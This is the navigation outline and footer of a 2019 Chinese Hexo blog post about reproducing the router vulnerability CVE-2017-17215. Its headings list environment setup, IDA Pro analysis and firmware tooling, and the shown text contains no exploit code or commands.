              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-复现CVE-2017-17215学习路由器漏洞分析"><span class="nav-number">1.</span> <span class="nav-text">1.复现CVE-2017-17215学习路由器漏洞分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-先补一下这个漏洞的详情"><span class="nav-number">2.</span> <span class="nav-text">2.先补一下这个漏洞的详情</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-分析环境是ubuntu-16-04"><span class="nav-number">2.1.</span> <span class="nav-text">1.分析环境是ubuntu 16.04.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-配置复现环境"><span class="nav-number">2.2.</span> <span class="nav-text">2. 配置复现环境</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-debian-org-gt-aurel32-qemu-mips-下载对应的debian-mips-qemu镜像"><span class="nav-number">2.3.</span> <span class="nav-text">3.debian.org/&gt;~aurel32/qemu/mips/下载对应的debian mips qemu镜像</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#（这部分是抄的，直接借鉴的）"><span class="nav-number"></span> <span class="nav-text">（这部分是抄的，直接借鉴的）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#4-环境搭建好，进行实际操作"><span class="nav-number">0.1.</span> <span class="nav-text">4. 环境搭建好，进行实际操作</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-甩进ida分析"><span class="nav-number">1.</span> <span class="nav-text">5.甩进ida分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#漏洞分析"><span class="nav-number">1.0.0.1.</span> <span class="nav-text">漏洞分析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-学习IDA-Pro"><span class="nav-number"></span> <span class="nav-text">2.学习IDA Pro</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#IDA-Pro基本知识"><span class="nav-number">0.1.</span> <span class="nav-text">IDA Pro基本知识</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-基本常识"><span class="nav-number">0.1.0.1.</span> <span class="nav-text">1. 基本常识</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-安装buildroot的坑"><span class="nav-number">0.2.</span> <span class="nav-text">3.安装buildroot的坑</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-MIPS交叉编译环境的搭建（Buildroot）"><span class="nav-number">0.2.1.</span> <span class="nav-text">1. MIPS交叉编译环境的搭建（Buildroot）</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-firmware-mod-kit工具的安装"><span class="nav-number">0.3.</span> <span class="nav-text">3. firmware-mod-kit工具的安装</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-安装依赖"><span class="nav-number">0.3.1.</span> <span class="nav-text">1.安装依赖</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-下载安装"><span class="nav-number">0.3.2.</span> <span class="nav-text">4. 下载安装</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">devil0x</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
